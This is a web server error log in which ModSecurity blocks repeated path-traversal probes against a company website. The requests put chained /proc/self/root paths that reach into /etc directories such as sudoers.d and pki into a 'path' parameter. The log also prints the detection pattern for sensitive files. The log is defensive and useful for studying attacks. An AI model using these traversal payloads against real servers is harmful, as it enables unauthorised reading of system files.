[Mon Mar 16 14:16:11.260751 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:34084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg626TCbgAP5jq5TegzIwAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:12.356007 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:45208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg63KTCbgAP5jq5TegzJQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:16:13.466298 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.243.203:34092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg63VajLEzk2WiQ-10ahgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:14.847947 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:34096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg63qQpVkWug9HeOt89vQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:16.203793 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:34098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg64NSswJuvopo3lOhndAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:17.525476 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:34106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg64bysWC90G-1nBrBM7gAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:22.830290 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:34116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg65pqj1wV0Si-Okef3EgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:29.135585 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:34810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg67aQpVkWug9HeOt89zgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:30.560179 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:34748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg67rysWC90G-1nBrBM8gAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:31.945632 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:34764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg677ysWC90G-1nBrBM8wAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:33.346097 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:34780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg68dSswJuvopo3lOhndQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:35.875897 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:34790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg685qj1wV0Si-Okef3FAAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:37.199991 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:34794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg69XjZBu2q05ozVU9hdgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:38.536880 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.243.203:34808] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg69njZBu2q05ozVU9hdwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:41.049016 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:34812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6-f9ocpUE4ed4uDz4UwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:42.414612 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:54934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6-v9ocpUE4ed4uDz4VAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:48.366793 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:54940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7AI6lpbStxTqkSkt02wAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:51.976381 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:54956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7A_9ocpUE4ed4uDz4VwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:17:01.128846 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:45222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7DVajLEzk2WiQ-10aswAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:17:26.506847 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.243.203:47046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7JqTCbgAP5jq5TegzYQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:17:28.963328 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:48004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7KP9ocpUE4ed4uDz4WwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
